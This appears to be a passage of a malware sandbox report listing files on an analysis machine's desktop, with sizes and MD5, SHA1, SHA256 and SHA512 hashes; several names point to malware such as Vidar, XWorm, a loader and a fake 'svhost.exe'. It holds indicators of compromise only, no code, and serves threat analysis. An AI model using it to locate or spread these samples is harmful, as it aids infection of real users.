dbe72d6c3d6ad2e20afe7927edd7bf402837061fd567c92745f6d057d3dfd4da333a6dd502af632d48bc17a4572515aa8ec5afac74fb693e8ee8df287943eb5b

Download Submit
C:\Users\Admin\Desktop\Files\02.08.2022.exe

Filesize
242KB

MD5
857b8e6cf94557690ecb114202bac37b

SHA1
616cedd26d96f2d039e6e60e8455dd94f11c50cd

SHA256
05ce0290075c90925e2a7687bb012b76e53b5c043ffaef0e467960254bac9147

SHA512
e444532444287c1596f6cc1051be6ef16ca261aa7ad11648ee46810e9869167ba9a19c9e960cd3b8462fbb5dce7550b2ebf8da0c38918519aa8224fefd8607eb

Download Submit
C:\Users\Admin\Desktop\Files\856.exe

Filesize
93KB

MD5
68edafe0a1705d5c7dd1cb14fa1ca8ce

SHA1
7e9d854c90acd7452645506874c4e6f10bfdda31

SHA256
68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d

SHA512
89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d

Download Submit
C:\Users\Admin\Desktop\Files\AUTOKEY.exe

Filesize
6.8MB

MD5
dbe16b8f431e6ada54f6cc6e42c13432

SHA1
561f4d4e5ee63135f71262efd450b5de4397e46e

SHA256
53c25b6ae56364a2e9594dfb1d35d7552fd27e75d16811d1a306bb25b8787e13

SHA512
f9520f6f2f73c696d9a47b02b01afd721e5655ea6972174b326b74be9ec535bcbdb064d4dd2a7ad54b20b00362272b971470700069305d50511503b96d07d029

Download Submit
C:\Users\Admin\Desktop\Files\ApertureLab.exe

Filesize
2.1MB

MD5
77970896073bbafdc8c1811414c62536

SHA1
c2d2fdbc9e80daa95e3046e2d3bd13e7ca312e18

SHA256
980fcb6365092cd752934417abb0f2a95bca452c58856240157107e70c1d754d

SHA512
5fc31572ad864ca15cd2eb7e8baadc62b72a72ad5d28da4ae04158f67b6cbfd1985983586fd6e51a4781bdffbdd557b30d44d38a3a37ae88cf785c834d739a30

Download Submit
C:\Users\Admin\Desktop\Files\Team.exe

Filesize
14.4MB

MD5
2f208b17f8bda673f6b4f0dacf43d1bf

SHA1
5131b890e8f91770039a889e72464b5ce411c412

SHA256
1fc3e92f7f30f4f68861d3ceb8284853ae30c11cbd0ed3e46ea9eb698b3ec348

SHA512
2830984abc5476e23609c947304f1124fd33f38e654b98bccbcde44e7fbadb75584983243e83a006b69403ac3d42ab379e1665989bec368320efdd5e98ad62df

Download Submit
C:\Users\Admin\Desktop\Files\XClient.exe

Filesize
59KB

MD5
cf14fac9fa45e4989ad1db2910ed98fd

SHA1
9e6381b831257bebf6356984e6ac3764aee72a84

SHA256
3df057f43a8c20c88fe2a2266ac09414fcf9dac4037e9a4f6e95ab66e6409636

SHA512
184a88c77ee9e8254cbe4489447d89a710b057efa6fe9f0510a93da91e200dd6717416b275140b31301fed6800884cc62b7941854565c96462f109dd7f972e0a

Download Submit
C:\Users\Admin\Desktop\Files\app64.exe

Filesize
32KB

MD5
40b887735996fc88f47650c322273a25

SHA1
e2f583114fcd22b2083ec78f42cc185fb89dd1ff

SHA256
d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a

SHA512
5dd81a17725c0fb9dae4341e4d5f46ba1035fdba2786a15b5288b4281cd7b0741889a6813da2f797a2581fed08d0f407b6fad0315bdac50ff62c94cb7a7ead13

Download Submit
C:\Users\Admin\Desktop\Files\boot.exe

Filesize
2.3MB

MD5
821faf50d57297a90ca78955054204ef

SHA1
19e46dcf3c0424b8b1e33b863297acc7e908b8b5

SHA256
5a137be3c113e77d9f0f49905cb6e25ea8d936bf2fe5eb76183d38e2140ce05a

SHA512
505140a95b8ea026d41ce48dccb9b327a0628b7f00dda9ef41caf9f6f7c849a4a5c230e8804df70b176ead3ad1a5894c0521cc4f195a3769541b4e13ebc341da

Download Submit
C:\Users\Admin\Desktop\Files\chrome_93.exe

Filesize
8.1MB

MD5
1248d4a486d79f6828c60b8385a1c2c6

SHA1
62c5e5305a75c60c8295aed427d5cc284ee97f1b

SHA256
addaf820ebd6d96728a5fb379579ee1536fb0993f6041d9ceef6e9e439c612a4

SHA512
16bd84d597f601d6ab81204e8431a270dac9ed6331d95dc1944ba0a814b139d68431dabb3249d5e789218bce3c8a3379855f1a142686de109d23bcbb64e6adb5

Download Submit
C:\Users\Admin\Desktop\Files\crypted.exe

Filesize
314KB

MD5
ff5afed0a8b802d74af1c1422c720446

SHA1
7135acfa641a873cb0c4c37afc49266bfeec91d8

SHA256
17ac37b4946539fa7fa68b12bd80946d340497a7971802b5848830ad99ea1e10

SHA512
11724d26e11b3146e0fc947c06c59c004c015de0afea24ec28a4eb8145fcd51e9b70007e17621c83f406d9aeb7cd96601245671d41c3fcc88a27c33bd7cf55ac

Download Submit
C:\Users\Admin\Desktop\Files\dccrypt.exe

Filesize
2.4MB

MD5
55398a65a9d1abb512e943a0d8901cb0

SHA1
9dfa573fad30f5010bc91cdf0752461aacaf36cf

SHA256
e91ebc7e19b4dec3ce6f2aaf4ee8fb9fb24cba265088781f9845d8a32d1f2948

SHA512
5cc41e3b79e35597f288737a7f65c035c56524c94d98dcb9892d656d92a6652a9f3b42a96b09d3fb10bd6e3c84fbe326efc64e252c0bc62d19ee6e80f1fdd556

Download Submit
C:\Users\Admin\Desktop\Files\discord.exe

Filesize
3.1MB

MD5
6a0bb84dcd837e83638f4292180bf5ab

SHA1
20e31ccffe1ac806e75ea839ea90b4c91e4322c5

SHA256
e119fe767f3d10a387df1951d4b356384c5a9d0441b4034ddf7293c389a410b4

SHA512
d0d61815c1ca73e4d1b8d5c3ea61e0572bfa9f6e984247b8e66c22e5591d61f766c6476c2686ce611917a56f2d4d8b8ddb4efcdbed707855e4190a2404eedcc5

Download Submit
C:\Users\Admin\Desktop\Files\exbuild.exe

Filesize
416KB

MD5
f5d7b79ee6b6da6b50e536030bcc3b59

SHA1
751b555a8eede96d55395290f60adc43b28ba5e2

SHA256
2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

SHA512
532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

Download Submit
C:\Users\Admin\Desktop\Files\file.exe

Filesize
225KB

MD5
af2379cc4d607a45ac44d62135fb7015

SHA1
39b6d40906c7f7f080e6befa93324dddadcbd9fa

SHA256
26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739

SHA512
69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

Download Submit
C:\Users\Admin\Desktop\Files\newtpp.exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
C:\Users\Admin\Desktop\Files\payload.exe

Filesize
7KB

MD5
ca6ae34bf2b35aacb25a27f94fb1f7d5

SHA1
267e8948660634859cd6cd021df6be33f3713e8a

SHA256
fc69cdadc5ef79a1ba2b40189ecd6af230b7d9e8076f98f9fbb7a880b2b1b236

SHA512
8f5fc64f8399c4337ce5e41d85e1cd32aabc2465e0b44d52741025958c1641e23a08ea67d2d01a6847cf3faa13681a21160b3ea7f248c5ea41ba80626c246f5c

Download Submit
C:\Users\Admin\Desktop\Files\random.exe

Filesize
4.3MB

MD5
3d029c2ccefa6792180ddb02c3be4542

SHA1
2119d193ebcdd0758ef66f254ce3de45de775179

SHA256
6982be2d4e047e708fc082cbc9ad44f8bcbb556924855d871ec6c091271545d0

SHA512
49fa75dc1fe78f49199a198e8971af53652738a2e10075cdd893b773547ad0bc88ca45f235e4c0030a0cf5bc514ca1ce6d7aa314e0b12b8c9f1900a241c5a4d1

Download Submit
C:\Users\Admin\Desktop\Files\svhost.exe

Filesize
502KB

MD5
e3cfe28100238a1001c8cca4af39c574

SHA1
9b80ea180a8f4cec6f787b6b57e51dc10e740f75

SHA256
78f9c811e589ff1f25d363080ce8d338fa68f6d2a220b1dd0360e799bbc17a12

SHA512
511e8a150d6539f555470367933e5f35b00d129d3ed3e97954da57f402d18711dfc86c93acc26f5c2b1b18bd554b8ea4af1ad541cd2564b793acc65251757324

Download Submit
C:\Users\Admin\Desktop\Files\svhoste.exe

Filesize
502KB

MD5
a9c9735f6e34482c1cdd09e347a98787

SHA1
6214e43cdc3fd17978955abf9c01a8d8c3ea791e

SHA256
533d8476431fefd3f83fd39d66366277b2420a549cb01e9232f558b2617871fc

SHA512
084b40e683d88e8eda7a60047f1a640310455986629a63382b3b6ffa6a91f295b47963e2ba52115cb113f57f1f727f2adb98f910a9adca1596af242f266b4a50

Download Submit
C:\Users\Admin\Desktop\Files\test9.exe

Filesize
354KB

MD5
d399231f6b43ac031fd73874d0d3ef4d

SHA1
161b0acb5306d6b96a0eac17ba3bedb8c4a1b0f2

SHA256
520db0cc6b1c86d163dff2797dcbc5f78b968313bedea85f7530830c87e0287f

SHA512
b1d0b94b0b5bc65113a196276d0a983872885c4b59dd3473bcaa6c60f2051de4579a7bc41082a2016472a3ec7de8bcf3ac446e3f3cb27521327fe166284d3400

Download Submit
C:\Users\Admin\Desktop\Files\vidar.exe

Filesize
383KB

MD5
1e1d5412616216fd90ea3cb6a87353db

SHA1
da0ae99aebbde6433c8dc985e8c8b2305cdb9b54

SHA256
765eb00651ebf6ddbc9c8d6e687292dae89f0d8260cea08505020992835208d8

SHA512
fcffb031004aa683656cd2d8ada0703255dd6fd01bf7e2b811e919ee33d4dff9b80ca6f17f44436c2a10d6bafa0abc4fb6c5f3151f167524293302841b00fbe3

Download Submit
C:\Users\Admin\Desktop\Files\xyaw4fkp.exe

Filesize
350KB

MD5
b7de42db6732cca194950ed4b2958762

SHA1
e676b09f930e97a404b4dfd1a173989c39fb2681

SHA256
cf8e5046effb930f4cbe727954ff23e2f02d6a91257ddca491d080f07018c5b6

SHA512
5a51ac59b4c10838874c413bf6adfbb646475603e079499489f09a2d9d0eb2c1ae7b96dd353fed428180af82b40b51f37b6393d75addfb7aefa17bb3c9845224

Download Submit
C:\Users\Admin\Desktop\Files\zzzz1.exe

Filesize
5.3MB

MD5
36a627b26fae167e6009b4950ff15805

SHA1
f3cb255ab3a524ee05c8bab7b4c01c202906b801

SHA256
a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a

SHA512
2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094

Download Submit
C:\Users\Admin\Desktop\GetOptimize.xlsx

Filesize
11KB

MD5
2d2b9a6ff03a13513d3e91d49114c723

SHA1
418546991189b5c709fa18c3d8a54609ab37bcf8

SHA256
2d5c9779a98d9c333b19e1dff45748a8bcd9cdd0198c05446be0f5dce73a15b9

SHA512
149286d9ea6e422259d78cc2e629e9f0f0a8b459008f069124ffc3c05acaf628758a2e480cf67ed2dd3933c7c01b71b22a1eeb3e883033f9ba921bac03b77b79

Download Submit
C:\Users\Admin\Desktop\HideCompress.rle

Filesize
235KB

MD5
c49946e11cc9841c0574888dd841fa42

SHA1
caa26daaf7e456317e19d0fead6a51007c4a27e9

SHA256
1fa5cafd9ebe39091005292486ae22da23af515d8e878c3288140ae4436cbdfd

SHA512
0204c2262ab8ad4ec3142adb789beb74423d5c54b8f714bde8157eb1915e53bb7b8c44bc3d22719bf769c811cb56fa10d6e109e642d56a915ff26f5ede730b0d

Download Submit
C:\Users\Admin\Desktop\ImportUninstall.mpg

Filesize
457KB

MD5
ca85a3f55a83fee74cff84059831ed44

SHA1
c2a3dd750b193f70f0f3aea89c9fd9d7a673cee3

SHA256
6cd8541bde27b6e7d85e75ccc44f584cf988da4b63c456efda4c3120362107ef

SHA512
19a811d940d23ec7083118cb2a8d02cf2004cf4e8d86a3141e4926371c8a8ad35e67a6f68625981fb918f46fd87dbd2162c102768029c3fd729a3f04bab81ac2

Download Submit
C:\Users\Admin\Desktop\InstallGet.vstx

Filesize
326KB

MD5
5fcdf02450343a3408933ac9f196cd94

SHA1
b6fed58a988812f126d496d6d73973f25687327f

SHA256
71abe93bff4c7036f741f85c7cb415c82e061972614b5546281e9ac05744d1ac

SHA512
989bf32a9d99e11258d192164a469b888a1d660b9ef87f0febd84744c0d2b94ef46b53196b2e0d2188c510023d08b081d23eb29d1c8127be05d99563a43d4dbc

Download Submit
C:\Users\Admin\Desktop\LimitPing.ppsm

Filesize
365KB

MD5
1e037c237e5277dbc0afecb84dbef53d

SHA1
0883087c399eaf4769de4e81e53e6c7060119b2e

SHA256
571d0f638d246a87042469df0a8d75a32e62b8d85567b57ec50777fe0879cf38

SHA512
f16dd10541eb35d6ab145493a1fd21405cf9314d0a7a17e93e997a6922cf5b8e454ee602ae9440ce208c0df443e30510899d3980b8d08af514e4c41b611fcb27

Download Submit
C:\Users\Admin\Desktop\MergeRestart.docx

Filesize
16KB

MD5
5b7f5caf977dfba07a4ed5f1a2477d8d

SHA1
b002f1ab2cad96d7c05b003c97ac49702d51e248

SHA256
d765be080fd645cc6abc9c663b6aedb8a77d60713402a72ad702b5163e20f1a6

SHA512
00328621b89d639eb6533d4a349a06ead91cfd96bcb60a11ad8b4c522dbba87423ed1e53e37e90140fed096cc1341e7e05366705cbc352447ca979f3399779b4

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse.zip

Filesize
7KB

MD5
a7b1b22096cf2b8b9a0156216871768a

SHA1
48acafe87df586a0434459b068d9323d20f904cb

SHA256
82fbb67bf03714661b75a49245c8fe42141e7b68dda3f97f765eb1f2e00a89a9

SHA512
35b3c89b18135e3aca482b376f5013557db636a332a18c4b43d34d3983e5d070a926c95e40966fafea1d54569b9e3c4ab483eaca81b015724d42db24b5f3805f

Download Submit
C:\Users\Admin\Desktop\NewMeasure.bmp

Filesize
483KB

MD5
700e2ce5bce4363310d289a702694084

SHA1
c5480e57b5789d82395bcd323c1d69269bed5695

SHA256
4ed922517cb92dce4a23493049a5352c9594794f7ffb9cb1edf18c2b13618d99

SHA512
5dd7f2b8e2d3c023856783ab26bbe95b8fa19cae9573955c2de82490debf98c7a3a1909fead9f6b6ec13ac0f553ce22c72da45543be1e5b499c96f05a6b46fdf

Download Submit
C:\Users\Admin\Desktop\OpenLock.rm

Filesize
248KB

MD5
fcbe529809764130770b562520bbc4a2

SHA1
af6ab6ae4f448c5c130c0d89ed036649757fe2b6

SHA256
df7e32da88445154bd366fe8197c857afef106756fe4aa2320e5cbc7fe4a4cf8

SHA512
c5dfe122affa3cd8c76c41ec6f36465109adee99d8b039864cf6c257ee937d7dae3cdc346212125b1a09d4b2e9389d3fbf6164087726f981af0588943bcc2f93

Download Submit
C:\Users\Admin\Desktop\ReceiveUnblock.potx

Filesize
313KB

MD5
d2f7304871f16f679548ec519045492c

SHA1
e5a3121473b7e64bcc47c8413733872c5d945657

SHA256
2b137e4c46a84375375553d3a5ce7b62f4b3d7ed9e09a6cd9eb6239d7bf6af5e

SHA512
c0d61778eef2de9d3564b43cd422a5f310133f515d92dbdd176f94638b5250b8e8192d1a7e470e75fd2245537b0609359d6b0157dc0683e882e4b39b4ed2cd5a

Download Submit
C:\Users\Admin\Desktop\RegisterShow.ADTS

Filesize
287KB

MD5
33a8a7b7c39698783d758a3fe0cb8c04

SHA1
5f249e533cdcd2bebc4ce6dd2a488687a1590231

SHA256
70418c6fb8c60426756b343b886cd1a321cbcfecd1cad6d4f651fe2b5fb7bca4

SHA512
df7dfe30fecd3b0c487754def84eb67b443fa4d3668afa31f210188fda52a28667a2493abfeccdbbe84dcf0b19105995ec3f3c1c4c06f533e7d0f1efe168a3af

Download Submit
C:\Users\Admin\Desktop\RequestRename.cr2

Filesize
404KB

MD5
d916b70335954dcf8902a4fc5f8175c9

SHA1
3ff8565c6e158a0f329ff057c6384c8dcdb528db

SHA256
83cf4e7e9cd066376c829e4a60ed9a30e3b76bcc4b97b0a6fe2a50b4ffb5d5b3

SHA512
b990104aa8eff72217c3b65d6ff9e658b949914a2cb9795db51486b1c8d19e8a5528420fbde85c194fd5532c2a0a7f582bed182a50778ac88386f4bc1d084ef2

Download Submit
C:\Users\Admin\Desktop\RequestTest.cr2

Filesize
378KB

MD5
2a4bb035a44082066e5a6f4cf666b87e

SHA1
043375a6e5e060bbe027d40f308619786c72ea88

SHA256
557d12b4f5932a6102e828e6c1ab0fcf630af132aa378aef28e11686cbc2eb22

SHA512
1f320aa655a054be62726b4ce6817bbc44910f341f17f26944e5538739e3dc6dfb113a9f49a89a423ae270d880152df5fc81279f4444c5d8668dccc8194e83ec

Download Submit
C:\Users\Admin\Desktop\ResetInitialize.docx

Filesize
19KB

MD5
a7a02761d5ef4818d8a9bab3b4be3a45

SHA1
fa80a0c39ac9ba7031dbcd3cd270d34fea948328

SHA256
29ac701ddd0359b85200357f9860373a8127562d41eb1153c3462a5e72ff4825

SHA512
b5e30da2a10ce40f52e64f116f305714a798db84282bbaaf89cf4677bfb632e901c7de22424991ac7b70df48f70e542cb82ab9f56034afd907a65e20b2fe8b92

Download Submit
C:\Users\Admin\Desktop\ResetPop.docx

Filesize
14KB

MD5
080676be075644b415476b407cf5eca0

SHA1
5ecb41365f14f6c0d86acf6ca575025f69e7c954

SHA256
dc92b3732e69935ae4d2475b97764a62c46a59f37cfa704d2f7002ceda693b10

SHA512
ce97381df831f1f01b3f7ace1743be2a78f777b52981c7ebf59840a558e9f182af8142ed081b7b796b92a793ada7be49eda0f35a00a5e77bb5758b61a8f894a3

Download Submit
C:\Users\Admin\Desktop\ResizeOut.lnk

Filesize
195KB

MD5
66d1d6b8f021a26369b484de9d5c600b

SHA1
5db5f45ced46f58c0f32446329f96d15b5eba1e0

SHA256
770f468dc5cb90762d7fd8caa6056fd24d0e8b008518d73bb76cee06e6cf920a

SHA512
bfdd2ee75002b87f46dda37c00798c40b379f93bae3a1e0512264d9af7d3437f2cd34121d536e76438fe0ed1bc046b9a6b9c96d1baad87506ca62391594dcb30

Download Submit
C:\Users\Admin\Desktop\ResumeRestart.cab

Filesize
182KB

MD5
c82da7d0f53b039cecc767f1b3226ca6

SHA1
5adf75fa33efbdddb93d21045f0033b45fbb4a6e

SHA256
99aeb1b6686690e7db773764ef89fa7b444e3bf8d7d42611e1cc1cf20ca45abc

SHA512
4a1a7889c7a7d54525d2103ca3a774b3af54521b5b9f0efd875bbbbed31335b9b75141fd0b14236c6edc2697b0c082084de056376a1d7ed13ab53b9f2df7a9cc

Download Submit
C:\Users\Admin\Desktop\RevokeMeasure.xml

Filesize
391KB

MD5
a9ee8d344f55c2ff14a42c9f008f298e

SHA1
3ada05d69b9fe9bb7f4ebb1a7d16a5992323839a

SHA256
57c1f289739abdd3162fc902fb8fe8d487e4b3662cbd411a48dc98a8a30e8c85

SHA512
5ad4437fbea8266908ab6f817fcb2b6a05c9b1e0a0bb51396b3686ad90681edacb98a80384a800372821e78c9d98123596159d85ba0c934e11e3d40d1de638af

Download Submit
C:\Users\Admin\Desktop\SelectInvoke.xlsx

Filesize
10KB

MD5
2307c8e6d57ce13511ec664ee76f1bca

SHA1
f0b826c1e61542fae8e733f3223dc3fd83a17417

SHA256
72780e5004d310d95ec1b5cd0eb71cce229bae541557552fce78419d419dd6aa

SHA512
bd58467e41186031f1d656d5919f91db7ea6b1cd2cffeab983c0a96ed2706a76ee99b972bdf968b3c2d3e72dbdebcb8e9e86c91f52d83a1cb7e29c0f5b9cc596

Download Submit
C:\Users\Admin\Desktop\StartJoin.mpa

Filesize
496KB

MD5
7c1ca8dfd5ab6370dd4e50b74e3258bc

SHA1
3f18f6967bb216e152b55b5e1ba827c8d9b1a6e2

SHA256
873e11b46864e54420d9b3681de435a058117d752309e5cd0442dbea5a444f1a

SHA512
835d8231918fb3557f7e9d9913c97b332889f0926dacbf243ed03bab48417130901f0181b576660f23127b6b2e8dbc76d8a56c2e2aaf6450998195c3c30bf984

Download Submit
C:\Users\Admin\Desktop\SubmitWrite.7z

Filesize
261KB

MD5
81389d6b0194725597f8caa279fa3eb6

SHA1
bb6968c382329a2b22b5dcf25bf4d3bd495a225e

SHA256
8406ffa424e53743713033763bc23e061d8d5480fc8d63eb14fd4b4ee24ad100

SHA512
15575abe0080b66d5a2af0b018e1865df31e930780a4af2ea7a54be3244e4c510077d58f10fe7a8d8f0dbd43462311fa8fbb9db3e35a2fb40ba6b76c01545eb1

Download Submit
C:\Users\Admin\Desktop\SyncOut.TTS

Filesize
718KB

MD5
39ed46dbe7c6a24c83a90e57802711af

SHA1
e8756251f0ce7cbdd3e95a75bb82b1de8fcb1b1e

SHA256
98859d0fd0e8ee5e17dc13a8985647b8bc292027fa20f6b444ea29e9200def9d

SHA512
54bb0941aee12b380c2ac003f4a63bce1a1450e3e57dbc587577a455948f5afc7ca6d899934987a40c7da2e6a1ca756929df090c63393acbf488a7e198897be7

Download Submit
C:\Users\Admin\Desktop\UndoLock.AAC

Filesize
417KB

MD5
7831748ae42ebba63f067a8f750cb829

SHA1
37eeb543d84db042bd0b3de5dd8f552a571e52ba

SHA256
a558a0ac554b7c7f449846bdcafb932248bc9996d64f560cdf0c4c882a945ffa

SHA512
d105fe9d6f7402edc8384107011828eb971c7d6028b3be873e215b7ea231418ba58597a119c1da21bdfe608d913ac9bb64aefd18c72e5681195b0b90a2c3b6ac

Download Submit
C:\Users\Admin\Desktop\UnprotectBlock.docx

Filesize
16KB

MD5
5e609ecc0714b74da27ee1f6092c8745

SHA1
036e32561fbb00e0623500c8f00964a23be5a5e7

SHA256
9af207788704039678620e444e532e5f5873a2170e5511ab351813b516cd2c21

SHA512
f5c5e0a3e2fda91584a756f76d62582a1ec74dfea3f160183292aefb2a884002a9c4a915784bb80da74d323414a19a8ed824dc938d55980be457bdb34725a87c

Download Submit
C:\Users\Admin\Desktop\UnregisterFind.au3

Filesize
470KB

MD5
3428e7a536fd6bb21de9aee661f3c67e

SHA1
21cb61cc30bce2ccdcd04d0e5b451f1e717c9b4b

SHA256
c372eefbe7a550c3d3261ae20f9636c35af1b5e757ddbd3569f8519e3f49d819

SHA512
87942cac865c40765649e5acce5ab1be57ff443124f92a4367ef93911c2016ef3bfda74ae2cdb36849d0643635d100c1432465cb757acfe296aebd24dcdd9f43

Download Submit
C:\Users\Admin\Desktop\UnregisterImport.docx

Filesize
16KB

MD5
fd6516b08356a796ca4986753838a894

SHA1
d3cbc93971a582a22a0b7ff7e8c69a54633002fd

SHA256
37e88709c42f1857f023da172aead99997e804fd83e2969b2af92d1af72a2aa2

SHA512
8ddaaf8e6e84e9ca7c72ec870866d2bb391ff2b0c4a94af20e0c2582ca6464d20b20644fa72922f3e409d2c46bc71f0ac1418061eb42e6d1470de4e6c329dba5

Download Submit
C:\Users\Admin\Desktop\WatchSync.vsdm

Filesize
208KB

MD5
cc6373d830376447939d06e30e42c909

SHA1
0e8ba4a774736cd6dd827def5d421852e4a6d891

SHA256
a79bf64c37c303d266281977ecfaaf0a38aad0f7b4aab8579bda500aac2b43bd

SHA512
e900dbf5af508fee2141957628411dff830d2ab287619e4514fa2c8571725752fea91f45a5357d920637dbc0d4d6b65e9715d885267912cc7d29f201b109b4b6

Download Submit
C:\Users\Admin\Desktop\a\02.08.2022.exe

Filesize
234KB

MD5
718d9132e5472578611c8a24939d152d

SHA1
8f17a1619a16ffbbc8d57942bd6c96b4045e7d68

SHA256
09810b0365c5ac275cca1a45ea00b00fdca819b7f10ce2c8a6a50a456d9e1ced

SHA512
6ae73ad6156bafa2e3f9a2b3466bca4d0a38d562b40aa29a84b6c9fe9380d2f99d73235b5d70208d6f2a3f607710eebf8c4daed6d387add0d933933fdd8c05de

Download Submit
C:\Users\Admin\Desktop\a\AmLzNi.exe

Filesize
1.0MB

MD5
73507ed37d9fa2b2468f2a7077d6c682

SHA1
f4704970cedac462951aaf7cd11060885764fe21

SHA256
c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6

SHA512
3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

Download Submit
C:\Users\Admin\Desktop\a\FaceBuild.exe

Filesize
9.3MB

MD5
d55a35cf27b971090b6bef17f5e75945

SHA1
10263fe2b4b921976eb77380eebc36a1f95521b8

SHA256
df0b6c507d2e16c5cac0ce6497fa707d815adc587c9acdeff897aaebaf2ad6c7

SHA512
90e5def9a431edf0855e155b15465170c19368d4068cb6bc616a463efa18625c3e964e970d6c9cf2c80e2b06d418a4816f95398fb79f7cb91ca8ea4b63fb8c5a

Download Submit
C:\Users\Admin\Desktop\a\Loader.exe

Filesize
63KB

MD5
56c640c4191b4b95ba344032afd14e77

SHA1
c93a0fd32b46718ca3bc7d1c78ae6236b88ef3c9

SHA256
ebd4b1ab90350e2f13d46f2a356d5a637d5bec704cf3af211c43a89cb11dd142

SHA512
617512f96443b7cc9cc315d2eb0322d8b359218d459e80821563336b67ac263f1da9b00c75bde73320d6540572552c47b436c683c862f19b5ed470273001e63e

Download Submit
C:\Users\Admin\Desktop\a\Registry.exe

Filesize
3.1MB

MD5
6f154cc5f643cc4228adf17d1ff32d42

SHA1
10efef62da024189beb4cd451d3429439729675b

SHA256
bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff

SHA512
050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

Download Submit
C:\Users\Admin\Desktop\a\SGVP%20Client%20Users.exe

Filesize
3.1MB

MD5
2fcfe990de818ff742c6723b8c6e0d33

SHA1
9d42cce564dcfa27b2c99450f54ba36d4b6eecaf

SHA256
cb731802d3cd29da2c01ffbb8c8ed4ef7de9d91c133b69b974583bede6bfd740

SHA512
4f20a27817de94a07071960abe0123277c0607a26de709e2ade201597df71d8c2eec7da353efba94dc6a8369b89db4caeaf9505d02b90dc30c37010a885c3613

Download Submit
C:\Users\Admin\Desktop\a\TPB-1.exe

Filesize
409KB

MD5
2d79aec368236c7741a6904e9adff58f

SHA1
c0b6133df7148de54f876473ba1c64cb630108c1

SHA256
b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35

SHA512
022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538

Download Submit
C:\Users\Admin\Desktop\a\TikTok18.exe

Filesize
2.4MB

MD5
70a396a9f154f9a70534b6608e92cb12

SHA1
1a4c735936c372df4f99a3ff3a024646d16a9f75

SHA256
51638445d940ee396b2d963473fa473840459920f0201a765ccb8cf8869741d5

SHA512
72322ef6c4ee7c278dccd755a487463e09e34551a2fd3f1fe7ba1bc216e275e7e17f36dbcf4f48b48875f416affc41bf9d2617fbd7fde759f265e7bdd55cc203

Download Submit
C:\Users\Admin\Desktop\a\Tutorial.exe

Filesize
7KB

MD5
07edde1f91911ca79eb6088a5745576d

SHA1
00bf2ae194929c4276ca367ef6eca93afba0e917

SHA256
755d0128ec5a265f8fe25fa220925c42171682801aa0160707ffc39719270936

SHA512
8ed0362290199a6e5b45dc09061a06112eae9a68bea11241a31e330be5ca83a5936f64e1139c33159c91e87320a20904891b3e48802626b809d6b37001c425e7

Download Submit
C:\Users\Admin\Desktop\a\VBVEd6f.exe

Filesize
1.1MB

MD5
7f8c660bbf823d65807e4164a91dd058

SHA1
97ac83cbe12b04fbe1b4d98e812480e1f66d577d

SHA256
5a45b35e922d52f1bc47530634465ed1f989d9916684bf9591006a6172542509

SHA512
89872cc15ca3a91d43b0b4261b04c38b8ac545c9b4afdb47d2b0288167b512fbe709de04fd2d1809ca1afee67a5a799aa7943f5aff65a5aa3197f9e10545c919

Download Submit
C:\Users\Admin\Desktop\a\Winsvc.exe

Filesize
2.1MB

MD5
169a647d79cf1b25db151feb8d470fc7

SHA1
86ee9ba772982c039b070862d6583bcfed764b2c

SHA256
e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708

SHA512
efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925

Download Submit
C:\Users\Admin\Desktop\a\XClient.exe

Filesize
32KB

MD5
ce69d13cb31832ebad71933900d35458

SHA1
e9cadfcd08d79a2624d4a5320187ae84cf6a0148

SHA256
9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf

SHA512
7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409

Download Submit
C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe

Filesize
14.9MB

MD5
3273f078f87cebc3b06e9202e3902b5c

SHA1
03b1971e04c8e67a32f38446bd8bfac41825f9cc

SHA256
4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c

SHA512
2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9

Download Submit
C:\Users\Admin\Desktop\a\aa.exe

Filesize
74KB
